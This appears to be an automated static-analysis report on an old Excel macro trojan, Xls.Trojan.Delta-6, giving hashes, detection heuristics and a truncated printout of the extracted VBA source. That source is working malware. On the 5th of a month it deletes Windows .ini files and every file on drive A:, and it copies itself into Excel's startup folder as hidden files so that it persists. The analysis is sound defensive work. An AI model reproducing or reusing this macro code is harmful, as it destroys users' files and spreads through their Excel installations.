Xls.Trojan.Delta-6 — Office (OLE) malware analysis

Static analysis result for SHA-256 a7664d16641569d3…

MALICIOUS

Office (OLE)

Size: 38.0 KB
Created: 1998-01-11 23:46:54
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: a625f95c0bfecc295dbb176787c4f472
SHA-1: 4b63500ad7bab6ad0de73404916d9397f50163a9
SHA-256: a7664d16641569d388c1c80a736c4758424d210b6da88d4b8b9c6308e61a623c
Risk Score: 260

Malware Insights

Xls.Trojan.Delta-6 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Delta-6. It contains VBA macros, including an Auto_Open macro, which runs automatically when the document is opened. The Auto_Close macro attempts to set file attributes for 'c:\msoffice\excel\xlstart\EXCELVBA.XLA', suggesting an attempt to establish persistence or manipulate startup behavior. The Auto_Open macro also calls the subroutines Chk1, Chk2, Dstr, Hdn, Tim, Icn_1, and Icn_3, indicating a multi-stage execution process.

Heuristics (5)

  • ClamAV: Xls.Trojan.Delta-6 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Delta-6
  • VBA macros detected [medium] (OLE_VBA_MACROS), 3 related findings
    Document contains VBA macro code
  • Auto_Open macro [high] (OLE_VBA_AUTO)
    Auto_Open macro
  • Auto_Close macro [high] (OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6383 bytes
SHA-256: 14e25583ecf1a604a620e4f3b98a667b39f6286792ee4de2ad02841601410b54
Detection: ClamAV: Xls.Trojan.Delta-6
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)

Attribute VB_Name = "Module1"

Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo cuek
    Application.DisplayStatusBar = False
    Call Chk1
    Call Chk2
    Call Dstr
    Call Hdn
    Call Tim
    Call Icn_1
    Call Icn_3
    Application.DisplayStatusBar = True
cuek:
End Sub

Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo vodo
    SetAttr ("c:\msoffice\excel\xlstart\EXCELVBA.XLA"), vbNormal
vodo:
End Sub


Sub Tim()
Attribute Tim.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnTime Now + TimeValue("00:15:00"), " Hlt "
End Sub

Sub Ky()
Attribute Ky.VB_ProcData.VB_Invoke_Func = " \n14"
    My_password = InputBox("This Is The Example Of My Project ! You Can Modified, Added in Order to be a God Hacker ! Please Type My Project Name to Continued or I'll Destroy Your Computer ! < By Bui'95 >", " Delta Project ")
    If My_password <> "Delta" Then
       MsgBox (" Sorry ..!, My Project Name is Delta ")
       Application.Quit
    Else
       On Error GoTo abis
       DialogSheets("Module1").Show
       Sheets("Dialog1").Select
       Sheets("Dialog1").Visible = False
    Exit Sub
    End If
abis:
End Sub

Sub Ghst()
Attribute Ghst.VB_ProcData.VB_Invoke_Func = " \n14"
GoTo low
     Set myobject = ActiveWorkbook
     If myobject.Application.Name = "BOOK1.XLS" Then
        Call Waw
     Else
        MsgBox " Wrong !", vbExclamation
     End If
low:
End Sub

Sub Trl()
Attribute Trl.VB_ProcData.VB_Invoke_Func = " \n14"
Set objectku = ActiveWindow
    objectku.OnWindow = "Waw"
End Sub

Sub Dstr()
Attribute Dstr.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo bail
    tgl = 13
    MyDate = Date
    If Day(MyDate) = 5 And Month(MyDate) > 1 Then
       Kill "c:\windows\*.ini"
       Kill "a:\*.*"
       Call Ky
    End If
bail:
End Sub


Sub Thc1()
Attribute Thc1.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo bae
    ChDrive "c:\"
    ChDir "c:\msoffice\excel\xlstart"
'    Application.DisplayStatusBar = False
    Sheets("Module1").Visible = True
    ExecuteExcel4Macro "VBA.MAKE.ADDIN(""c:\msoffice\excel\xlstart\EXCELVBA.XLA"")"
    Sheets("Module1").Select
    Call txt
    Sheets("Module1").Select
    Call prt
    Sheets("Module1").Visible = False
'   Sheets("Sheet1").Select
'   Application.DisplayStatusBar = True
    SetAttr ("c:\msoffice\excel\xlstart\EXCELVBA.XLA"), vbHidden
bae:
End Sub

Sub Chk1()
Attribute Chk1.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo kajeun
    mysize = FileLen("c:\msoffice\excel\xlstart\excelvba.xla")    ' Returns file length (bytes).
    If mysize < 22000 Then
       Call Thc1
    Else
        GoTo diam
    End If
kajeun:
    Call Thc1
diam:
End Sub


Sub Chk2()
Attribute Chk2.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo baeah
    mybra = FileLen("c:\msoffice\excel\xlstart\book1.xls")     ' Returns file length (bytes).
    If mybra < 22000 Then
      Call Thc2
    Else
      GoTo cuek
    End If
baeah:
    Call Thc2
cuek:
End Sub


Sub Thc2()
Attribute Thc2.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo wow
    ActiveWorkbook.SaveAs filename:="c:\msoffice\excel\xlstart\BOOK1.XLS", FileFormat:=xlNormal, _
    Password:="", WriteResPassword:="", ReadOnlyRecommended:=False _
    , CreateBackup:=False
wow:
End Sub

Sub ins()
Attribute ins.VB_ProcData.VB_Invoke_Func = " \n14"
     SetAttr ("c:\msoffice\excel\xlstart\excelvbs.txt"), vbNormal
     Set mytarget = ActiveSheet
     Set myobject = ActiveWorkbook
        On Error GoTo oke
        Sheets("Module1").Visible = True
        Call prt
        Sheets("Module1").Visible = False
'      If myobject.Name <> "BOOK1.XLS" And mytarget.Name <> "Module1" Then
        SetAttr ("c:\msoffice\excel\xlstart\excelvbs.txt"), vbHidden
         Call Hdn
         Call Waw
         Exit Sub
'      End If
oke:
        ActiveWorkbook.Modules().Add
        Acti
... (truncated)